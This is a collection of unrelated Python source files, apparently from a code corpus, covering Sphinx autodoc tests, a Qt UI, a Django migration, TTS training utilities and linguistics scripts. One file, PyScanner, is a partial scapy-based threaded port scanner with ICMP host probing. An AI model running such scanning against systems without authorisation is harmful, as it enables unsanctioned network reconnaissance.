target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:function:: read(r: _io.BytesIO) -> my.module.StringIO', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:function:: sum(x: myint, y: myint) -> myint', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:data:: variable', ' :module: target.autodoc_type_aliases', ' :type: myint', '', ' docstring', '', '', '.. py:data:: variable2', ' :module: target.autodoc_type_aliases', ' :type: myint', ' :value: None', '', ' docstring', '', ] @pytest.mark.skipif(sys.version_info < (3, 7), reason='python 3.7+ is required.') @pytest.mark.sphinx('text', testroot='ext-autodoc', srcdir='autodoc_typehints_description_and_type_aliases', confoverrides={'autodoc_typehints': "description", 'autodoc_type_aliases': {'myint': 'myint'}}) def test_autodoc_typehints_description_and_type_aliases(app): (app.srcdir / 'autodoc_type_aliases.rst').write_text('.. autofunction:: target.autodoc_type_aliases.sum') app.build() context = (app.outdir / 'autodoc_type_aliases.txt').read_text() assert ('target.autodoc_type_aliases.sum(x, y)\n' '\n' ' docstring\n' '\n' ' Parameters:\n' ' * **x** (*myint*) --\n' '\n' ' * **y** (*myint*) --\n' '\n' ' Return type:\n' ' myint\n' == context) @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autodoc_default_options(app): # no settings actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' not in actual assert ' .. py:attribute:: EnumCls.val4' not in actual actual = do_autodoc(app, 'class', 'target.CustomIter') assert ' .. py:method:: target.CustomIter' not in actual actual = do_autodoc(app, 'module', 'target') assert '.. py:function:: save_traceback(app)' not in actual # with :members: app.config.autodoc_default_options = {'members': None} actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' in actual assert ' .. py:attribute:: EnumCls.val4' not in actual # with :members: = True app.config.autodoc_default_options = {'members': None} actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' in actual assert ' .. py:attribute:: EnumCls.val4' not in actual # with :members: and :undoc-members: app.config.autodoc_default_options = { 'members': None, 'undoc-members': None, } actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' in actual assert ' .. py:attribute:: EnumCls.val4' in actual # with :special-members: # Note that :members: must be *on* for :special-members: to work. app.config.autodoc_default_options = { 'members': None, 'special-members': None } actual = do_autodoc(app, 'class', 'target.CustomIter') assert ' .. py:method:: CustomIter.__init__()' in actual assert ' Create a new `CustomIter`.' in actual assert ' .. py:method:: CustomIter.__iter__()' in actual assert ' Iterate squares of each value.' in actual if not IS_PYPY: assert ' .. py:attribute:: CustomIter.__weakref__' in actual assert ' list of weak references to the object (if defined)' in actual # :exclude-members: None - has no effect. Unlike :members:, # :special-members:, etc. where None == "include all", here None means # "no/false/off". app.config.autodoc_default_options = { 'members': None, 'exclude-members': None, } actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' in actual assert ' .. py:attribute:: EnumCls.val4' not in actual app.config.autodoc_default_options = { 'members': None, 'special-members': None, 'exclude-members': None, } actual = do_autodoc(app, 'class', 'target.CustomIter') assert ' .. py:method:: CustomIter.__init__()' in actual assert ' Create a new `CustomIter`.' in actual assert ' .. py:method:: CustomIter.__iter__()' in actual assert ' Iterate squares of each value.' in actual if not IS_PYPY: assert ' .. py:attribute:: CustomIter.__weakref__' in actual assert ' list of weak references to the object (if defined)' in actual assert ' .. py:method:: CustomIter.snafucate()' in actual assert ' Makes this snafucated.' in actual @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autodoc_default_options_with_values(app): # with :members: app.config.autodoc_default_options = {'members': 'val1,val2'} actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' in actual assert ' .. py:attribute:: EnumCls.val2' in actual assert ' .. py:attribute:: EnumCls.val3' not in actual assert ' .. py:attribute:: EnumCls.val4' not in actual # with :member-order: app.config.autodoc_default_options = { 'members': None, 'member-order': 'bysource', } actual = do_autodoc(app, 'class', 'target.Class') assert list(filter(lambda l: '::' in l, actual)) == [ '.. py:class:: Class(arg)', ' .. py:method:: Class.meth()', ' .. py:method:: Class.skipmeth()', ' .. py:method:: Class.excludemeth()', ' .. py:attribute:: Class.attr', ' .. py:attribute:: Class.docattr', ' .. py:attribute:: Class.udocattr', ' .. py:attribute:: Class.mdocattr', ' .. py:method:: Class.moore(a, e, f) -> happiness', ' .. py:attribute:: Class.inst_attr_inline', ' .. py:attribute:: Class.inst_attr_comment', ' .. py:attribute:: Class.inst_attr_string', ] # with :special-members: app.config.autodoc_default_options = { 'special-members': '__init__,__iter__', } actual = do_autodoc(app, 'class', 'target.CustomIter') assert ' .. py:method:: CustomIter.__init__()' in actual assert ' Create a new `CustomIter`.' in actual assert ' .. py:method:: CustomIter.__iter__()' in actual assert ' Iterate squares of each value.' in actual if not IS_PYPY: assert ' .. py:attribute:: CustomIter.__weakref__' not in actual assert ' list of weak references to the object (if defined)' not in actual # with :exclude-members: app.config.autodoc_default_options = { 'members': None, 'exclude-members': 'val1' } actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' not in actual assert ' .. py:attribute:: EnumCls.val2' in actual assert ' .. py:attribute:: EnumCls.val3' in actual assert ' .. py:attribute:: EnumCls.val4' not in actual app.config.autodoc_default_options = { 'members': None, 'special-members': None, 'exclude-members': '__weakref__,snafucate', } actual = do_autodoc(app, 'class', 'target.CustomIter') assert ' .. py:method:: CustomIter.__init__()' in actual assert ' Create a new `CustomIter`.' in actual assert ' .. py:method:: CustomIter.__iter__()' in actual assert ' Iterate squares of each value.' in actual if not IS_PYPY: assert ' .. py:attribute:: CustomIter.__weakref__' not in actual assert ' list of weak references to the object (if defined)' not in actual assert ' .. py:method:: CustomIter.snafucate()' not in actual assert ' Makes this snafucated.' not in actual
nilq/baby-python
python
from collections import Counter def mejority(lst): freDict = Counter(lst) size = len(lst) for key, value in freDict.items(): if value > (size//2): print(key) return print("None") if __name__ == "__main__": lst = [3, 3, 4, 2, 4, 4, 2, 2,2,2,2] mejority(lst)
nilq/baby-python
python
import pytest import pathlib from align.cell_fabric import Canvas, Pdk, Wire mydir = pathlib.Path(__file__).resolve().parent pdkfile = mydir.parent.parent / 'pdks' / 'FinFET14nm_Mock_PDK' / 'layers.json' @pytest.fixture def setup(): p = Pdk().load(pdkfile) c = Canvas(p) c.addGen( Wire( nm='m2', layer='M2', direction='h', clg=None, spg=None)) m2 = p['M2'] m2['AdjacentAttacker'] = 1 assert 'Width' in m2 dy = m2['Width']//2 py = m2['Pitch'] c.terminals = [ {'layer': 'M2', 'netName': 'x', 'rect': [ 0, 0*py-dy, 200, 0*py+dy], "netType": "drawing"}, {'layer': 'M2', 'netName': 'y', 'rect': [ 200, 1*py-dy, 400, 1*py+dy], "netType": "drawing"} ] return c def test_adjacent_ok(setup): c = setup c.gen_data() assert c.drc.num_errors == 0 def test_adjacent_bad(setup): c = setup c.terminals[1]['rect'][0] += 1 c.terminals[1]['rect'][2] += 1 c.gen_data() assert c.drc.num_errors == 1 def test_adjacent_ok2(setup): c = setup c.terminals[1]['rect'][0] += 2 c.terminals[1]['rect'][2] += 2 c.gen_data() assert c.drc.num_errors == 0
nilq/baby-python
python
# -*- coding: utf-8 -*- """ Script Name: PipelineTool.py Author: Do Trinh/Jimmy - 3D artist. Description: This is main UI of PipelineTool. """ # ------------------------------------------------------------------------------------------------------------- """ Import """ # PLM from PLM import __homepage__, __appName__ from pyPLM.damg import DAMGDICT from pyPLM.Widgets import MainWindow, Widget, GridLayout from pyPLM.Gui import LogoIcon from .components import MainStatusBar, MidTab, BotTab, MainHeader from .models import ButtonManager, ActionManager from PLM.cores import ThreadManager # ------------------------------------------------------------------------------------------------------------- """ Pipeline Tool main layout """ class PipelineManager(MainWindow): key = 'PipelineManager' _name = __appName__ toolBars = DAMGDICT() menus = DAMGDICT() _count = 0 def __init__(self, parent=None): super(PipelineManager, self).__init__(parent) self.url = __homepage__ self.setObjectName(self.name) self.setWindowTitle(self.name) self.setWindowIcon(LogoIcon('PLM')) self.actionManager = ActionManager(self.parent) self.buttonManager = ButtonManager(self.parent) self.threadManager = ThreadManager(self.parent) self.mainWidget = Widget() self.layout = GridLayout() self.mainWidget.setLayout(self.layout) self.setCentralWidget(self.mainWidget) self.buildUI() def buildUI(self): self.header = MainHeader(self.parent) self.body = MidTab(self.buttonManager, self) self.footer = BotTab(self) self.statusBar = MainStatusBar(self) self.menus = self.header.menuBar.menus self.toolBars = self.header.toolBar.toolBars self.mns = self.header.menuBar.mns self.tbs = self.header.toolBar.tbs self.updating = self.header.connectStatus.updating self.server = self.header.connectStatus.server self.connectServer = self.header.connectStatus.connectServer self.connectInternet = self.header.connectStatus.connectInternet self.layouts = [self.header, self.body, self.footer, self.statusBar] self.layout.addWidget(self.header, 0, 0, 2, 9) self.layout.addWidget(self.body, 2, 0, 8, 9) self.layout.addWidget(self.footer, 10, 0, 6, 9) self.setStatusBar(self.statusBar) self.body.setFixedHeight(400) self.updateSize() def resizeEvent(self, event): self.updateSize() # print('header: {0}, body: {1}, footer: {2}'.format(self.header.height(), self.body.height(), self.footer.height())) super(PipelineManager, self).resizeEvent(event) def updateSize(self): bodySize = self.body.size() baseW = bodySize.width() baseH = bodySize.height() self.header.resize(baseW, baseH / 4) self.footer.resize(baseW, baseH * 3 / 4) @property def count(self): return self._count @count.setter def count(self, val): self._count = val # ------------------------------------------------------------------------------------------------------------- # Created by panda on 6/07/2018 - 11:31 AM # © 2017 - 2018 DAMGTEAM. All rights reserved
nilq/baby-python
python
from pyiced import ( column, css_color, IcedApp, Length, radio, Settings, text, WindowSettings, ) class RadioExample(IcedApp): class settings(Settings): class window(WindowSettings): size = (640, 320) def __init__(self): self.__season = None def title(self): return 'Radio Example' def background_color(self): match self.__season: case 1: return css_color.MEDIUMSPRINGGREEN case 2: return css_color.LIGHTGOLDENRODYELLOW case 3: return css_color.GOLDENROD case 4: return css_color.GHOSTWHITE def update(self, msg, clipboard): match msg: case 'select', value: self.__season = value def view(self): return column( [ text("What's your favorite season?"), radio('select', self.__season, 1, 'Spring'), radio('select', self.__season, 2, 'Summer'), radio('select', self.__season, 3, 'Fall'), radio('select', self.__season, 4, 'Winter'), ], padding=20, spacing=5, width=Length.FILL, height=Length.FILL, ) if __name__ == '__main__': RadioExample().run()
nilq/baby-python
python
# Copyright (C) 2021 ServiceNow, Inc. """ Combine output datasets from different source datasets e.g. If you have generated training datasets for dataset A and dataset B you can combine them into A+B using this script It will *not* overwrite existing files (an error will be thrown). Input files must exist (an error will be thrown otherwise). It assumes that the output file will be saved to the same folder as the input (/nrcan_p2/data/03_primary/). It assumes nrcan specific file naming conventions. You MUST update the dataset parameters below. """ import pathlib import subprocess ################################### # DATASET PARAMETERS PIPE = 'PIPELINE_BERT_80_POSTPIPE_BERT_SPACY_2' #'PIPELINE_GLOVE_80_POSTPIPE_GLOVE' DATASET_A = 'dA_full_dB' DATASET_B = 'dD' DATASET_C = 'dA_full_dB_dD' ################################### print('Combining files...') DIR_MAPPING = { 'dA_full': 'v4', 'dB': 'v4_B', 'dD': 'v4_D', 'dA_full_dB': 'v4_A_B', 'dA_full_dB_dD': 'v4_A_B_D' } DIR_A = DIR_MAPPING[DATASET_A] DIR_B = DIR_MAPPING[DATASET_B] DIR_C = DIR_MAPPING[DATASET_C] FILE_A = f'/nrcan_p2/data/03_primary/{DIR_A}/all_text_{PIPE}_{DATASET_A}_v1.txt' print(FILE_A) FILE_B = f'/nrcan_p2/data/03_primary/{DIR_B}/all_text_{PIPE}_{DATASET_B}_v1.txt' print(FILE_B) print('... into:') FILE_C = f'/nrcan_p2/data/03_primary/{DIR_C}/all_text_{PIPE}_{DATASET_C}_v1.txt' print(FILE_C) file_a = pathlib.Path(FILE_A) file_b = pathlib.Path(FILE_B) file_c = pathlib.Path(FILE_C) LOG_FILE = file_c.parent / (file_c.stem + '.log') if not file_a.exists(): raise(ValueError(f'File a does not exist: {FILE_A}')) if not file_b.exists(): raise(ValueError(f'File b does not exist: {FILE_B}')) if file_c.exists(): raise(ValueError(f'File c already exists. You must delete it manually: {FILE_C}')) with open(LOG_FILE, 'w') as lf: lf.write(f'FILE_A: {FILE_A}\n') lf.write(f'FILE_B: {FILE_B}\n') lf.write(f'FILE_C: {FILE_C}\n') with open(file_a, 'r') as fa, open(file_b, 'r') as fb, open(file_c, 'w') as fc: for line in fa: fc.write(line) for line in fb: fc.write(line) if not file_c.exists(): raise ValueError('ERROR! Something went wrong in the concatenation.')
nilq/baby-python
python
import logging, queue from datetime import datetime import threading from time import strftime from .scanner_thread import ScannerThread from scapy.all import * class PyScanner: def __init__(self, params_names={"-threads":5, "-ip": "127.0.0.1", "-ports":"0-100", "-scan_type": "S"}): # print("ok") # print(dir(queue)) params_names["-threads"]=int(params_names["-threads"]) threads_count = params_names["-threads"] scan_type = params_names["-scan_type"] #now we will calculate self.lock = threading.Lock() self.queue = queue.Queue() ports_pair = params_names["-ports"].split("-") ports_ranges = self.calcTasks(threads_num=threads_count, ports=ports_pair) #timer, that we will use to get speed start_clock = datetime.now() self.threads = [] for i in range(params_names["-threads"]): thread = ScannerThread(dest_ip=params_names["-ip"], ports=ports_ranges[i], thread_num=i, scan_type = scan_type) self.threads.append(thread) for th in self.threads: th.start() th.join() end_clock = datetime.now() def calcTasks(self, threads_num=1, ports=[0,65536], queue=[]): [ports[0], ports[1]] = [int(ports[0]), int(ports[1])] ports_count_range = round((ports[1] - ports[0])/threads_num) #getting count of ports pairs ports_ranges = [] last_from = ports[0] last_to = last_from + ports_count_range for i in range(threads_num): ports = {"from": last_from + 1, "to": last_to} ports_ranges.append(ports) last_from = ports["to"] last_to = last_from + ports_count_range print("there is ports ranges") print(ports_ranges) return ports_ranges def checkhost(self, ip="127.0.0.1"): # conf.verb = 0 a=send(IP(ttl=10, dst=ip)/ICMP()) print(a) print("\n[*] Target is up, Beginning scanning...") # try: # a=send(IP(ttl=10, dst=ip)/ICMP()) # print(a) # print("\n[*] Target is up, Beginning scanning...") # except Exception: # print("\nCouldn't resolve Target: %s((", ip) # print(Exception)
nilq/baby-python
python
def som(n): if len(n) == 1: return n s = 0 for i in range(len(n)): s += int(n[i]) return som(str(s)) while True: e = str(input()).split() a = e[0] b = e[1] if a == b == '0': break ta = som(a) tb = som(b) if ta > tb: print(1) elif ta < tb: print(2) else: print(0)
nilq/baby-python
python
# Generated by Django 2.0.4 on 2018-12-13 12:38 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('tradukoj', '0007_bcp47_default'), ] operations = [ migrations.CreateModel( name='GetTextFile', fields=[ ('id', models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('file', models.FileField(upload_to='')), ('file_type', models.IntegerField( choices=[(0, 'PO file'), (1, 'MO file')], default=0)), ('last_updated_date', models.DateTimeField( auto_now=True, db_index=True, verbose_name='Last updated date')), ('done', models.BooleanField(default=False)), ('done_with_errors', models.BooleanField(default=False)), ('log', models.TextField(max_length=1024, verbose_name='Log')), ('bcp47', models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name='get_text_files', to='tradukoj.BCP47', verbose_name='Lang')), ], ), migrations.CreateModel( name='Namespace', fields=[ ('id', models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('text', models.CharField( max_length=255, unique=True, verbose_name='text key')), ], ), migrations.AlterField( model_name='translationkey', name='namespace', field=models.CharField(max_length=255), ), migrations.AlterField( model_name='translationkey', name='text', field=models.CharField(max_length=255, verbose_name='text key'), ), migrations.AddField( model_name='translationkey', name='new_namespace', field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translation_keys', to='tradukoj.Namespace'), ), migrations.AlterUniqueTogether( name='translationkey', unique_together={('namespace', 'text')}, ), migrations.AddField( model_name='gettextfile', name='namespace', field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name='get_text_files', to='tradukoj.Namespace'), ), ]
nilq/baby-python
python
import shutil from pathlib import Path import hydra import matplotlib.pyplot as plt import numpy as np import torch from hydra.utils import to_absolute_path from omegaconf import OmegaConf from torch import nn, optim from torch.utils import data as data_utils from torch.utils.tensorboard import SummaryWriter from ttslearn.logger import getLogger from ttslearn.util import init_seed, load_utt_list, pad_1d, pad_2d def get_epochs_with_optional_tqdm(tqdm_mode, nepochs): """Get epochs with optional progress bar. Args: tqdm_mode (str): Progress bar mode. nepochs (int): Number of epochs. Returns: iterable: Epochs. """ if tqdm_mode == "tqdm": from tqdm import tqdm epochs = tqdm(range(1, nepochs + 1), desc="epoch") else: epochs = range(1, nepochs + 1) return epochs def moving_average_(model, model_test, beta=0.9999): """Exponential moving average (EMA) of model parameters. Args: model (torch.nn.Module): Model to perform EMA on. model_test (torch.nn.Module): Model to use for the test phase. beta (float, optional): [description]. Defaults to 0.9999. """ for param, param_test in zip(model.parameters(), model_test.parameters()): param_test.data = torch.lerp(param.data, param_test.data, beta) def num_trainable_params(model): """Count the number of trainable parameters in the model. Args: model (torch.nn.Module): Model to count the number of trainable parameters. Returns: int: Number of trainable parameters. """ parameters = filter(lambda p: p.requires_grad, model.parameters()) return sum([np.prod(p.size()) for p in parameters]) class Dataset(data_utils.Dataset): # type: ignore """Dataset for numpy files Args: in_paths (list): List of paths to input files out_paths (list): List of paths to output files """ def __init__(self, in_paths, out_paths): self.in_paths = in_paths self.out_paths = out_paths def __getitem__(self, idx): """Get a pair of input and target Args: idx (int): index of the pair Returns: tuple: input and target in numpy format """ return np.load(self.in_paths[idx]), np.load(self.out_paths[idx]) def __len__(self): """Returns the size of the dataset Returns: int: size of the dataset """ return len(self.in_paths) def get_data_loaders(data_config, collate_fn): """Get data loaders for training and validation. Args: data_config (dict): Data configuration. collate_fn (callable): Collate function. Returns: dict: Data loaders. """ data_loaders = {} for phase in ["train", "dev"]: utt_ids = load_utt_list(to_absolute_path(data_config[phase].utt_list)) in_dir = Path(to_absolute_path(data_config[phase].in_dir)) out_dir = Path(to_absolute_path(data_config[phase].out_dir)) in_feats_paths = [in_dir / f"{utt_id}-feats.npy" for utt_id in utt_ids] out_feats_paths = [out_dir / f"{utt_id}-feats.npy" for utt_id in utt_ids] dataset = Dataset(in_feats_paths, out_feats_paths) data_loaders[phase] = data_utils.DataLoader( dataset, batch_size=data_config.batch_size, collate_fn=collate_fn, pin_memory=True, num_workers=data_config.num_workers, shuffle=phase.startswith("train"), ) return data_loaders def collate_fn_dnntts(batch): """Collate function for DNN-TTS. Args: batch (list): List of tuples of the form (inputs, targets). Returns: tuple: Batch of inputs, targets, and lengths. """ lengths = [len(x[0]) for x in batch] max_len = max(lengths) x_batch = torch.stack([torch.from_numpy(pad_2d(x[0], max_len)) for x in batch]) y_batch = torch.stack([torch.from_numpy(pad_2d(x[1], max_len)) for x in batch]) l_batch = torch.tensor(lengths, dtype=torch.long) return x_batch, y_batch, l_batch def collate_fn_wavenet(batch, max_time_frames=100, hop_size=80, aux_context_window=2): """Collate function for WaveNet. Args: batch (list): List of tuples of the form (inputs, targets). max_time_frames (int, optional): Number of time frames. Defaults to 100. hop_size (int, optional): Hop size. Defaults to 80. aux_context_window (int, optional): Auxiliary context window. Defaults to 2. Returns: tuple: Batch of waveforms and conditional features. """ max_time_steps = max_time_frames * hop_size xs, cs = [b[1] for b in batch], [b[0] for b in batch] # 条件付け特徴量の開始位置をランダム抽出した後、それに相当する短い音声波形を切り出します c_lengths = [len(c) for c in cs] start_frames = np.array( [ np.random.randint( aux_context_window, cl - aux_context_window - max_time_frames ) for cl in c_lengths ] ) x_starts = start_frames * hop_size x_ends = x_starts + max_time_steps c_starts = start_frames - aux_context_window c_ends = start_frames + max_time_frames + aux_context_window x_cut = [x[s:e] for x, s, e in zip(xs, x_starts, x_ends)] c_cut = [c[s:e] for c, s, e in zip(cs, c_starts, c_ends)] # numpy.ndarray のリスト型から torch.Tensor 型に変換します x_batch = torch.tensor(x_cut, dtype=torch.long) # (B, T) c_batch = torch.tensor(c_cut, dtype=torch.float).transpose(2, 1) # (B, C, T') return x_batch, c_batch def ensure_divisible_by(feats, N): """Ensure that the number of frames is divisible by N. Args: feats (np.ndarray): Input features. N (int): Target number of frames. Returns: np.ndarray: Input features with number of frames divisible by N. """ if N == 1: return feats mod = len(feats) % N if mod != 0: feats = feats[: len(feats) - mod] return feats def collate_fn_tacotron(batch, reduction_factor=1): """Collate function for Tacotron. Args: batch (list): List of tuples of the form (inputs, targets). reduction_factor (int, optional): Reduction factor. Defaults to 1. Returns: tuple: Batch of inputs, input lengths, targets, target lengths and stop flags. """ xs = [x[0] for x in batch] ys = [ensure_divisible_by(x[1], reduction_factor) for x in batch] in_lens = [len(x) for x in xs] out_lens = [len(y) for y in ys] in_max_len = max(in_lens) out_max_len = max(out_lens) x_batch = torch.stack([torch.from_numpy(pad_1d(x, in_max_len)) for x in xs]) y_batch = torch.stack([torch.from_numpy(pad_2d(y, out_max_len)) for y in ys]) il_batch = torch.tensor(in_lens, dtype=torch.long) ol_batch = torch.tensor(out_lens, dtype=torch.long) stop_flags = torch.zeros(y_batch.shape[0], y_batch.shape[1]) for idx, out_len in enumerate(out_lens): stop_flags[idx, out_len - 1 :] = 1.0 return x_batch, il_batch, y_batch, ol_batch, stop_flags def set_epochs_based_on_max_steps_(train_config, steps_per_epoch, logger): """Set epochs based on max steps. Args: train_config (TrainConfig): Train config. steps_per_epoch (int): Number of steps per epoch. logger (logging.Logger): Logger. """ logger.info(f"Number of iterations per epoch: {steps_per_epoch}") if train_config.max_train_steps < 0: # Set max_train_steps based on nepochs max_train_steps = train_config.nepochs * steps_per_epoch train_config.max_train_steps = max_train_steps logger.info( "Number of max_train_steps is set based on nepochs: {}".format( max_train_steps ) ) else: # Set nepochs based on max_train_steps max_train_steps = train_config.max_train_steps epochs = int(np.ceil(max_train_steps / steps_per_epoch)) train_config.nepochs = epochs logger.info( "Number of epochs is set based on max_train_steps: {}".format(epochs) ) logger.info(f"Number of epochs: {train_config.nepochs}") logger.info(f"Number of iterations: {train_config.max_train_steps}") def save_checkpoint( logger, out_dir, model, optimizer, epoch, is_best=False, postfix="" ): """Save a checkpoint. Args: logger (logging.Logger): Logger. out_dir (str): Output directory. model (nn.Module): Model. optimizer (Optimizer): Optimizer. epoch (int): Current epoch. is_best (bool, optional): Whether or not the current model is the best. Defaults to False. postfix (str, optional): Postfix. Defaults to "". """ if isinstance(model, nn.DataParallel): model = model.module out_dir.mkdir(parents=True, exist_ok=True) if is_best: path = out_dir / f"best_loss{postfix}.pth" else: path = out_dir / "epoch{:04d}{}.pth".format(epoch, postfix) torch.save( { "state_dict": model.state_dict(), "optimizer_state": optimizer.state_dict(), }, path, ) logger.info(f"Saved checkpoint at {path}") if not is_best: shutil.copyfile(path, out_dir / f"latest{postfix}.pth") def plot_attention(alignment): """Plot attention. Args: alignment (np.ndarray): Attention. """ fig, ax = plt.subplots() alignment = alignment.cpu().data.numpy().T im = ax.imshow(alignment, aspect="auto", origin="lower", interpolation="none") fig.colorbar(im, ax=ax) plt.xlabel("Decoder time step") plt.ylabel("Encoder time step") return fig def plot_2d_feats(feats, title=None): """Plot 2D features. Args: feats (np.ndarray): Input features. title (str, optional): Title. Defaults to None. """ feats = feats.cpu().data.numpy().T fig, ax = plt.subplots() im = ax.imshow( feats, aspect="auto", origin="lower", interpolation="none", cmap="viridis" ) fig.colorbar(im, ax=ax) if title is not None: ax.set_title(title) return fig def setup(config, device, collate_fn): """Setup for traiining Args: config (dict): configuration for training device (torch.device): device to use for training collate_fn (callable): function to collate mini-batches Returns: (tuple): tuple containing model, optimizer, learning rate scheduler, data loaders, tensorboard writer, and logger. .. note:: 書籍に記載のコードは、この関数を一部簡略化しています。 """ # NOTE: hydra は内部で stream logger を追加するので、二重に追加しないことに注意 logger = getLogger(config.verbose, add_stream_handler=False) logger.info(f"PyTorch version: {torch.__version__}") # CUDA 周りの設定 if torch.cuda.is_available(): from torch.backends import cudnn cudnn.benchmark = config.cudnn.benchmark cudnn.deterministic = config.cudnn.deterministic logger.info(f"cudnn.deterministic: {cudnn.deterministic}") logger.info(f"cudnn.benchmark: {cudnn.benchmark}") if torch.backends.cudnn.version() is not None: logger.info(f"cuDNN version: {torch.backends.cudnn.version()}") logger.info(f"Random seed: {config.seed}") init_seed(config.seed) # モデルのインスタンス化 model = hydra.utils.instantiate(config.model.netG).to(device) logger.info(model) logger.info( "Number of trainable params: {:.3f} million".format( num_trainable_params(model) / 1000000.0 ) ) # (optional) 学習済みモデルの読み込み # ファインチューニングしたい場合 pretrained_checkpoint = config.train.pretrained.checkpoint if pretrained_checkpoint is not None and len(pretrained_checkpoint) > 0: logger.info( "Fine-tuning! Loading a checkpoint: {}".format(pretrained_checkpoint) ) checkpoint = torch.load(pretrained_checkpoint, map_location=device) model.load_state_dict(checkpoint["state_dict"]) # 複数 GPU 対応 if config.data_parallel: model = nn.DataParallel(model) # Optimizer optimizer_class = getattr(optim, config.train.optim.optimizer.name) optimizer = optimizer_class( model.parameters(), **config.train.optim.optimizer.params ) # 学習率スケジューラ lr_scheduler_class = getattr( optim.lr_scheduler, config.train.optim.lr_scheduler.name ) lr_scheduler = lr_scheduler_class( optimizer, **config.train.optim.lr_scheduler.params ) # DataLoader data_loaders = get_data_loaders(config.data, collate_fn) set_epochs_based_on_max_steps_(config.train, len(data_loaders["train"]), logger) # Tensorboard の設定 writer = SummaryWriter(to_absolute_path(config.train.log_dir)) # config ファイルを保存しておく out_dir = Path(to_absolute_path(config.train.out_dir)) out_dir.mkdir(parents=True, exist_ok=True) with open(out_dir / "model.yaml", "w") as f: OmegaConf.save(config.model, f) with open(out_dir / "config.yaml", "w") as f: OmegaConf.save(config, f) return model, optimizer, lr_scheduler, data_loaders, writer, logger
nilq/baby-python
python
## Licensed under the Apache License, Version 2.0 (the "License"); ## you may not use this file except in compliance with the License. ## You may obtain a copy of the License at ## ## http://www.apache.org/licenses/LICENSE-2.0 ## ## Unless required by applicable law or agreed to in writing, software ## distributed under the License is distributed on an "AS IS" BASIS, ## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ## See the License for the specific language governing permissions and ## limitations under the License. # Creates a list of potential "cognates" for a pair of languages. # # Assumes you have lingpy (http://lingpy.org/) and tabulate # (https://pypi.org/project/tabulate/) installed. # # Example usage: # # python3 scripts/find_cognates_lingpy.py \ # --language1=French # --language2=Hanunoo # # Output: # # cat /var/tmp/cognates/filtered_cognates_French_Hanunoo # ʒ u ʀ s i r a ŋ from absl import app from absl import flags import collections import csv import os from lingpy import * from tabulate import tabulate flags.DEFINE_string("output_dir", "/var/tmp/cognates", "Output directory") flags.DEFINE_string("language1", None, "Language 1") flags.DEFINE_string("language2", None, "Language 1") flags.DEFINE_string("pairlist", "list_data/cognates.csv", "Pathname of list of cognates extracted for " "the languages in Section 6 of Blevins & Sproat") FLAGS = flags.FLAGS def make_pairlist(path, l1, l2): """Creates pair list for l1 and l2. Args: dir: output directory l1: language 1 l2: language 2 """ pairlist = [] with open(path) as stream: reader = csv.DictReader(stream) for row in reader: if row[l1] == "-" or row[l2] == "-": continue pairlist.append((row["GLOSS"], row[l1], row[l2])) return pairlist def make_initial_cognate_tsv(dir, l1, l2, pairlist): """Collects initial "cognates" for l1 and l2. Args: dir: output directory l1: language 1 l2: language 2 pairlist: list of "cognate" pairs of l1, l2 """ filename = "{}/initial_cognates_{}_{}".format(dir, l1, l2) with open(filename, "w") as ostream: ostream.write("# {} <-> {}\n".format(l1, l2)) ostream.write("ID\tTaxon\tGloss\tGlossID\tIPA\tTokens\n") id_ = 1 gloss_id = 1 for (gloss, p1, p2) in pairlist: if gloss == "GLOSS": continue ostream.write("#\n") ostream.write( "{}\t{}\t{}\t{}\t{}\t{}\n".format( id_, l1, gloss, gloss_id, p1.replace(" ", ""), p1)) id_ += 1 ostream.write( "{}\t{}\t{}\t{}\t{}\t{}\n".format( id_, l2, gloss, gloss_id, p2.replace(" ", ""), p2)) id_ += 1 gloss_id += 1 def collect_potential_cognates(dir, l1, l2, threshold=0.55, runs=10000): """Collects potential cognates for l1 and l2. Args: dir: output directory l1: language 1 l2: language 2 threshold: threshold for acceptance of cognate, distance from lex.align_pairs runs: number of runs to perform """ filename = "{}/initial_cognates_{}_{}".format(dir, l1, l2) lex = LexStat(filename) lex.get_scorer(runs=runs) table = [] # He sorts the keys :), so we have to present them in sorted order for keying # into his tables. if l2 < l1: L1, L2 = l2, l1 else: L1, L2 = l1, l2 initial_list_len = 0 for key, (idxA, idxB) in enumerate(lex.pairs[L1, L2]): almA, almB, dst = lex.align_pairs(idxA, idxB, mode="overlap", pprint=False) initial_list_len += 1 if dst <= threshold: table += [[ key+1, lex[idxA, "concept"], lex[idxA, "tokens"], lex[idxB, "tokens"], round(dst, 2)]] # Eschew writing this out in tabular format and instead just write out l1 and # l2, one "cognate" per line, so that this can be used directly by # # generate_random_cognate_lists.sh with open("{}/filtered_cognates_{}_{}".format(dir, l1, l2), "w") as stream: for row in table: _, _, l1, l2, _ = row stream.write("{}\t{}\n".format(" ".join(l1), " ".join(l2))) def main(unused_argv): try: os.mkdir(FLAGS.output_dir) except FileExistsError: pass pairlist = make_pairlist(FLAGS.pairlist, FLAGS.language1, FLAGS.language2) make_initial_cognate_tsv(FLAGS.output_dir, FLAGS.language1, FLAGS.language2, pairlist) collect_potential_cognates(FLAGS.output_dir, FLAGS.language1, FLAGS.language2) if __name__ == "__main__": flags.mark_flag_as_required("language1") flags.mark_flag_as_required("language2") app.run(main)
nilq/baby-python
python
